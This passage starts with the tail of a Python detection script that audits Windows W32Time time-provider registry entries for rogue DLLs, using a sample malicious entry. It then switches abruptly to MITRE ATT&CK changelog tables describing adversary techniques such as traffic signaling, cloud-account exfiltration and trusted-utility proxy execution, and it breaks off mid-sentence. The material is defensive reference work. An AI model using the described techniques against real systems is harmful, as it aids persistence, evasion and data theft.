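                  "Enabled": 1, "InputProvider": 1},
    "NtpServer": {"DllName": r"%systemroot%\system32\w32time.DLL",
                  "Enabled": 0, "InputProvider": 0},
    "TimeSyncHelper": {"DllName": r"C:\ProgramData\TimeSync\tshelper.dll",
                       "Enabled": 1, "InputProvider": 1},
}


def collect_from_registry():
    """Snapshot every TimeProviders subkey on a live Windows host (winreg only)."""
    import winreg
    snap = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, W32TIME_KEY) as root:
        i = 0
        while True:
            try:
                name = winreg.EnumKey(root, i)
            except OSError:
                break
            i += 1
            with winreg.OpenKey(root, name) as sub:
                vals = {}
                for v in ("DllName", "Enabled", "InputProvider"):
                    try:
                        vals[v] = winreg.QueryValueEx(sub, v)[0]
                    except FileNotFoundError:
                        vals[v] = None
                snap[name] = vals
    return snap


def _norm(path):
    """Case-fold and expand %systemroot%/%windir%, assuming C:\\Windows."""
    p = (path or "").lower().replace("/", "\\")
    for var in ("%systemroot%", "%windir%"):
        p = p.replace(var, "c:\\windows")
    return p


def analyze(snapshot, baseline=BASELINE):
    """Map provider name -> list of issues for providers that deviate from baseline."""
    findings = {}
    for name, vals in snapshot.items():
        issues = []
        dll = _norm(vals.get("DllName"))
        if name not in baseline:
            issues.append("provider not in baseline")
        elif dll != _norm(baseline[name]):
            issues.append("DllName differs from baseline")
        if dll and not dll.startswith("c:\\windows\\system32\\"):
            issues.append("DLL outside System32")
        if issues and vals.get("Enabled") == 1:
            issues.append("provider is enabled, so the DLL loads at service start")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    snap = collect_from_registry() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for name, issues in analyze(snap).items():
        print(name, snap[name]["DllName"], "; ".join(issues))
```

Because registration needs only a Registry write plus a DLL on disk, the Registry value set is the right thing to diff, and the check worth keeping even in a mature baseline is the last one: a provider that deviates and is `Enabled` will be loaded by the W32Time service as Local Service on the next start or parameter change, which is the persistence the description describes. A disabled stray subkey is still worth a ticket, just not a page.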
| Old Description | New Description |
|---|---|
| Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. | Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. 
Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020. | |
| external_references | CAPEC-117 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] | |
| external_references | CAPEC-117 | |
| external_references | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 15:23:37.640000+00:00 | 2022-04-18 22:16:51.359000+00:00 |
| description | Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. | Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. 
Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. |
| external_references[1]['source_name'] | capec | Cisco Traffic Mirroring |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/117.html | https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html |
| external_references[2]['source_name'] | Cisco Traffic Mirroring | Juniper Traffic Mirroring |
| external_references[2]['description'] | Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020. | Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020. |
| external_references[2]['url'] | https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html | https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html |
| external_references[3]['source_name'] | Juniper Traffic Mirroring | Cisco Blog Legacy Device Attacks |
| external_references[3]['description'] | Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020. | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. |
| external_references[3]['url'] | https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 |
| external_references[5]['source_name'] | Cisco Blog Legacy Device Attacks | capec |
| external_references[5]['url'] | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 | https://capec.mitre.org/data/definitions/117.html |
| x_mitre_data_sources[0] | Network Traffic: Network Connection Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Network Traffic: Network Connection Creation |
| Old Description | New Description |
|---|---|
| Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) | Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-17 14:23:49.495000+00:00 | 2022-10-19 23:08:40.603000+00:00 |
| description | Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) | Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet) |
| external_references[1]['source_name'] | Hartrell cd00r 2002 | Bleeping Computer - Ryuk WoL |
| external_references[1]['description'] | Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018. | Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. |
| external_references[1]['url'] | https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 | https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ |
| external_references[2]['source_name'] | Cisco Synful Knock Evolution | AMD Magic Packet |
| external_references[2]['description'] | Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. | AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021. |
| external_references[2]['url'] | https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices | https://www.amd.com/system/files/TechDocs/20213.pdf |
| external_references[3]['source_name'] | FireEye - Synful Knock | Mandiant - Synful Knock |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html | https://www.mandiant.com/resources/synful-knock-acis |
| external_references[4]['source_name'] | Cisco Blog Legacy Device Attacks | Cisco Synful Knock Evolution |
| external_references[4]['description'] | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. | Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. |
| external_references[4]['url'] | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 | https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices |
| external_references[5]['source_name'] | Bleeping Computer - Ryuk WoL | Hartrell cd00r 2002 |
| external_references[5]['description'] | Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. | Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018. |
| external_references[5]['url'] | https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ | https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 |
| external_references[6]['source_name'] | AMD Magic Packet | Cisco Blog Legacy Device Attacks |
| external_references[6]['description'] | AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021. | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. |
| external_references[6]['url'] | https://www.amd.com/system/files/TechDocs/20213.pdf | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 |
| x_mitre_version | 2.2 | 2.4 |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Tony Lee | |
| x_mitre_data_sources | Network Traffic: Network Traffic Flow |
| Description |
|---|
| Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection. A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces. Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.280000+00:00 | 2022-06-16 19:21:04.897000+00:00 |
| external_references[1]['source_name'] | DOJ GRU Indictment Jul 2018 | AWS EBS Snapshot Sharing |
| external_references[1]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022. |
| external_references[1]['url'] | https://www.justice.gov/file/1080281/download | https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html |
| x_mitre_data_sources[0] | Snapshot: Snapshot Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Cloud Storage: Cloud Storage Modification | Cloud Storage: Cloud Storage Metadata |
| x_mitre_detection | Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. | Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. In AWS, sharing an Elastic Block Store (EBS) snapshot, either with specified users or publicly, generates a ModifySnapshotAttribute event in CloudTrail logs.(Citation: AWS EBS Snapshot Sharing) Similarly, in Azure, creating a Shared Access Signature (SAS) URI for a Virtual Hard Disk (VHS) snapshot generates a "Get Snapshot SAS URL" event in Activity Logs.(Citation: Azure Blob Snapshots)(Citation: Azure Shared Access Signature) |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Azure Shared Access Signature', 'description': 'Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.', 'url': 'https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature'} | |
| external_references | {'source_name': 'Azure Blob Snapshots', 'description': 'Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.', 'url': 'https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview'} | |
| external_references | {'source_name': 'DOJ GRU Indictment Jul 2018', 'description': 'Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.', 'url': 'https://www.justice.gov/file/1080281/download'} | |
| x_mitre_contributors | Darin Smith, Cisco | |
| x_mitre_contributors | ExtraHop | |
| x_mitre_data_sources | Cloud Storage: Cloud Storage Modification | |
| x_mitre_data_sources | Snapshot: Snapshot Metadata | |
| x_mitre_data_sources | Snapshot: Snapshot Creation |
| Old Description | New Description |
|---|---|
| Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM', 'root'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-02 15:20:28.455000+00:00 | 2022-04-19 23:04:44.258000+00:00 |
| description | Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| external_references[1]['source_name'] | FireEye APT38 Oct 2018 | DOJ Lazarus Sony 2018 |
| external_references[1]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. |
| external_references[1]['url'] | https://content.fireeye.com/apt/rpt-apt38 | https://www.justice.gov/opa/press-release/file/1092091/download |
| external_references[2]['source_name'] | DOJ Lazarus Sony 2018 | FireEye APT38 Oct 2018 |
| external_references[2]['description'] | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. |
| external_references[2]['url'] | https://www.justice.gov/opa/press-release/file/1092091/download | https://content.fireeye.com/apt/rpt-apt38 |
| x_mitre_data_sources[0] | Process: OS API Execution | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Process: OS API Execution |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:57:08.312000+00:00 | 2022-05-05 05:00:37.443000+00:00 |
| external_references[1]['source_name'] | engima0x3 DNX Bypass | Exploit Monday WinDbg |
| external_references[1]['description'] | Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017. | Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017. |
| external_references[1]['url'] | https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ | http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html |
| external_references[2]['source_name'] | engima0x3 RCSI Bypass | LOLBAS Tracker |
| external_references[2]['description'] | Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017. | LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019. |
| external_references[2]['url'] | https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ | https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/ |
| external_references[3]['source_name'] | Exploit Monday WinDbg | engima0x3 RCSI Bypass |
| external_references[3]['description'] | Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017. | Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017. |
| external_references[3]['url'] | http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html | https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ |
| external_references[4]['source_name'] | LOLBAS Tracker | engima0x3 DNX Bypass |
| external_references[4]['description'] | LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019. | Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017. |
| external_references[4]['url'] | https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/ | https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ |
| x_mitre_defense_bypassed[0] | Application control | Application Control |
| Old Description | New Description |
|---|---|
| Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) | Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated 